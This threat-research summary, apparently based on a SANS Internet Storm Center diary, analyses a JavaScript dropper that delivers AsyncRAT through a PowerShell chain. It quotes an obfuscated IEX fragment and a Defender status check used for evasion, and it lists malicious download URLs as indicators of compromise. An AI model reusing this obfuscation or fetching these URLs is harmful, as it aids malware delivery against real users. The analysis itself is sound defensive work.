Threat Research

From JavaScript to AsyncRAT – SANS Internet Storm Center

Securonix

A heavily obfuscated JavaScript dropper named “_Rechnung_01941085434_PDF.js” uses UTF-16 BOM, massive unused code, and embedded Base64 to conceal its payloads. It then drops a multi-stage PowerShell chain that downloads and executes remote payloads, culminating in a .NET assembly that implements AsyncRAT in memory. #AsyncRAT #PowerShell #IEX #Rechnung_01941085434_PDF_js

Keypoints

  • The dropper relies on a Byte Order Mark (BOM) to signal big-endian UTF-16 encoding, complicating static analysis.
  • It contains vast blocks of unused text and Base64-encoded data hidden inside fake variables to hide the real payloads.
  • When decoded, the sample uses SpiderMonkey to reveal the next stage, enabling further debugging of the dropper.
  • A PowerShell-based chain executes a payload using IEX, including obfuscated code like “$([char](9992-9887)+’ex’)”.
  • The chain fetches additional payloads from remote servers (e.g., bottom-tier PHP endpoints) and loads a .NET assembly into memory for execution, indicative of a fileless/memory-resident approach.
  • The final payload (AsyncRAT) is delivered via in-memory loading and remote downloads, signifying a multi-stage malware delivery and C2 setup.

MITRE Techniques

  • [T1027] Obfuscated/Compressed Files and Information – The dropper uses UTF-16 BOM and massive unused code to conceal the real payload. Quote: “The file uses BOM (Byte Order Mark) to indicate that the file is encoded in big-endian UTF-16.”
  • [T1059.001] PowerShell – The payload is executed via PowerShell, including an IEX-based obfuscated stage. Quote: “A PowerShell payload will be executed. You can see the classic IEX obfuscated as “$([char](9992-9887)+’ex’)”.”
  • [T1105] Ingress Tool Transfer – The malware downloads multiple payloads from remote servers for execution. Quote: “The payload is downloaded from: hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1”
  • [T1071.001] Web Protocols – The campaign relies on HTTP/HTTPS URLs to retrieve and deliver payloads. Quote: “The payload is downloaded from: hxxp://gklmeliificagac[.]top/vc7etyp5lhhtr.php?…”; later stages involve non-secure or obfuscated endpoints.
  • [T1518.001] Security Software Discovery – An anti-analysis attempt queries AV status via Get-MpComputerStatus; the attempt fails in lab. Quote: “Get-MpComputerStatus()[3]. This cmdlet will return the status of the AV but it failed…”

Indicators of Compromise

  • [URL] The first-stage drop URL – oiutvh4f.top/1.php?s=mints1
  • [URL] Secondary payload URL – gklmeliificagac.top/vc7etyp5lhhtr.php?id=win10vm&key=127807548032&s=mints1
  • [URL] Final payload download – https://temp.sh/bfseS/ruzxs.exe
  • [File] Dropper name – _Rechnung_01941085434_PDF.js
  • [Malware] AsyncRAT as the final payload family

Read more: https://isc.sans.edu/diary/rss/30788